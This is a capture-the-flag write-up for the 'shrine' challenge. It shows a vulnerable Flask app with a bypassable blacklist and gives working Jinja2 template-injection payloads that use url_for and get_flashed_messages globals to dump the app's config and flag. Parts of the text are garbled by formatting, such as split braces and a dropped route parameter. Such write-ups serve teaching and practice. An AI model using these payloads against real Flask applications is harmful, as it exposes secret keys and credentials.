[CTF/Network Security] A detailed analysis of the problem solving of shrine in the offensive and defensive world
posture
Format code:
import flask
import os
app = flask.Flask(__name__) #创建了一个 Flask 应用对象
app.config['FLAG'] = os.environ.pop('FLAG') #设置了一个名为 FLAG 的配置项,其值来自环境变量,并将环境变量移除。
@app.route('/')
def index():
return open(__file__).read()
# 打开当前文件并返回其内容
@app.route('/shrine/')
def shrine(shrine): #接受一个参数 shrine,并使用 safe_jinja() 函数进行处理和渲染 Jinja2 模板
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{
{% set {}=None %}}'.format(c) for c in blacklist]) + s
#替换字符串中的括号,并将黑名单中的关键字设为 None。然后使用 flask.render_template_string() 方法渲染模板。
return flask.render_template_string(safe_jinja(shrine))
# 渲染安全的 Jinja2 模板
if __name__ == '__main__':
app.run(debug=True)
#在直接运行该脚本时才会执行以下的 app.run(debug=True),即运行 Flask 应用
This code is a simple Flask application. It creates a Flask application object and sets a configuration item called FLAG whose value comes from an environment variable. Two routes are then defined, one for returning the content of the current file and the other for rendering Jinja2 templates.
It is speculated that the flag is in the config named FLAG, but the blacklist filters the config and injects it through Jinja2 Lenovo SSTI
In this program, /shrine/ is the defined routing path, which will match the function that handles this path.
So construct the path:
/shirne/{
{
1*1}}
The echo is as follows:
Explain that SSTI is feasible
method one
In Flask, the url_for function is defined in the global namespace of Flask, so url_for.__globals__
the content of the global namespace of Flask can be obtained by visiting.
Get current.app, because config contains application configuration information, such as database connection strings, keys, etc. So we visit the config of the current app and construct a POC visit:
/shrine/{
{
url_for.__globals__['current_app'].config}}
#在 Flask 全局命名空间中访问当前应用程序的配置对象
The echo is as follows:
get the flag
Method Two
get_flashed_messages() is a function provided by Flask, which is used to obtain messages delivered to users through Flask's message flash mechanism (flash).
In Flask, flash messages are a temporary storage mechanism that allows passing messages from one request to the next. It is typically used to display a one-time prompt or warning message between users.
Payload:
/shrine/{
{
get_flashed_messages.__globals__}}
# 访问全局命名空间
Payload:
/shrine/{
{
get_flashed_messages.__globals__['current_app'].config}}
#同理,访问当前app的配置文件
get the flag
Summarize
The above is a detailed analysis of [CTF/Network Security] offensive and defensive world shrine problem solving, and investigates Jinja2's SSTI injection.
I am Qiu said , see you next time.